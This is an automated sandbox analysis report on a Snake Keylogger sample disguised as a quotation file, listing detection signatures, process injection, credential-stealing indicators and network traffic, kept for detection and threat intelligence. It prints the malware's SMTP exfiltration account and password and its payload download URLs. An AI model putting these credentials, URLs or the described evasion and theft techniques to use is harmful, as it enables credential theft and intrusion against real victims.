Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION_NOVQTRA071244PDF.scr.exe

Overview

General Information

Sample name:QUOTATION_NOVQTRA071244PDF.scr.exe
Analysis ID:1559133
MD5:5287698c5838c217c8330670920d1f22
SHA1:61d94cd397d56e87a13207f680f88fdf829eef71
SHA256:852c78744e828250542bb9ddf2d7f2797c5613d2ab69cbd0faff944469d2c03b
Tags:exescruser-abuse_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QUOTATION_NOVQTRA071244PDF.scr.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe" MD5: 5287698C5838C217C8330670920D1F22)
    • aspnet_compiler.exe (PID: 7792 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "abbsend@qlststv.com", "Password": "G!!HFpD@N*]*nF", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2961287104.0000019050ECE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0x21508:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    • 0x24a3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    00000000.00000002.2214752450.0000022880090000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2215561209.00000228E70FA000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x1ff0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0x5526:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880090000.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          4.2.aspnet_compiler.exe.19060c900e8.1.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            4.2.aspnet_compiler.exe.19060c900e8.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x1259b:$a1: get_encryptedPassword
            • 0x1287f:$a2: get_encryptedUsername
            • 0x123a7:$a3: get_timePasswordChanged
            • 0x124a2:$a4: get_passwordField
            • 0x125b1:$a5: set_encryptedPassword
            • 0x13b86:$a7: get_logins
            • 0x13ae9:$a10: KeyLoggerEventArgs
            • 0x13782:$a11: KeyLoggerEventArgsEventHandler
            4.2.aspnet_compiler.exe.19060c900e8.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x19e95:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x190c7:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x194fa:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1a539:$a5: \Kometa\User Data\Default\Login Data
            4.2.aspnet_compiler.exe.19060c900e8.1.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x1311a:$s1: UnHook
            • 0x13121:$s2: SetHook
            • 0x13129:$s3: CallNextHook
            • 0x13136:$s4: _hook
            Click to see the 17 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: AspNetCompiler Execution
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe, ParentProcessId: 7268, ParentProcessName: QUOTATION_NOVQTRA071244PDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 7792, ProcessName: aspnet_compiler.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T08:19:02.546000+010028033053Unknown Traffic192.168.2.449741188.114.97.3443TCP
            2024-11-20T08:19:03.803744+010028033053Unknown Traffic192.168.2.449744188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T08:19:00.694601+010028032742Potentially Bad Traffic192.168.2.449739193.122.6.16880TCP
            2024-11-20T08:19:01.944617+010028032742Potentially Bad Traffic192.168.2.449739193.122.6.16880TCP
            2024-11-20T08:19:03.257175+010028032742Potentially Bad Traffic192.168.2.449742193.122.6.16880TCP
            2024-11-20T08:19:04.632112+010028032742Potentially Bad Traffic192.168.2.449745193.122.6.16880TCP
            2024-11-20T08:19:05.913370+010028032742Potentially Bad Traffic192.168.2.449758193.122.6.16880TCP
            2024-11-20T08:19:07.194701+010028032742Potentially Bad Traffic192.168.2.449765193.122.6.16880TCP
            2024-11-20T08:19:08.444614+010028032742Potentially Bad Traffic192.168.2.449775193.122.6.16880TCP
            2024-11-20T08:19:09.913364+010028032742Potentially Bad Traffic192.168.2.449781193.122.6.16880TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "abbsend@qlststv.com", "Password": "G!!HFpD@N*]*nF", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}
            Multi AV Scanner detection for submitted file
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeReversingLabs: Detection: 36%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E7016000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C31000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214866648.0000022880380000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E7016000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C31000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214866648.0000022880380000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FFD9B96A235h4_2_00007FFD9B969E4D
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FFD9B969C1Bh4_2_00007FFD9B9699B0
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FFD9B967470h4_2_00007FFD9B967419
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FFD9B96A235h4_2_00007FFD9B96A151
            Source: global trafficHTTP traffic detected: GET /data-package/I7fmQg9d/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /storage/download/ndvzPJWaMUSB HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /data-package/I7fmQg9d/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49758 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49781 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49765 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49775 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /data-package/I7fmQg9d/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /storage/download/ndvzPJWaMUSB HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /data-package/I7fmQg9d/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: filetransfer.io
            Source: global trafficDNS traffic detected: DNS query: s24.filetransfer.io
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: aspnet_compiler.exe, 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filetransfer.io
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeString found in binary or memory: http://filetransfer.io/data-package/I7fmQg9d/download
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050DB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C21000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: aspnet_compiler.exe, 00000004.00000002.2960737490.0000019050B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coH
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6CCE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/I7fmQg9d/download
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050DE4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E4D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050EA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: aspnet_compiler.exe, 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75p
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s24.filetransfer.io
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C94000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s24.filetransfer.io/storage/download/ndvzPJWaMUSB
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
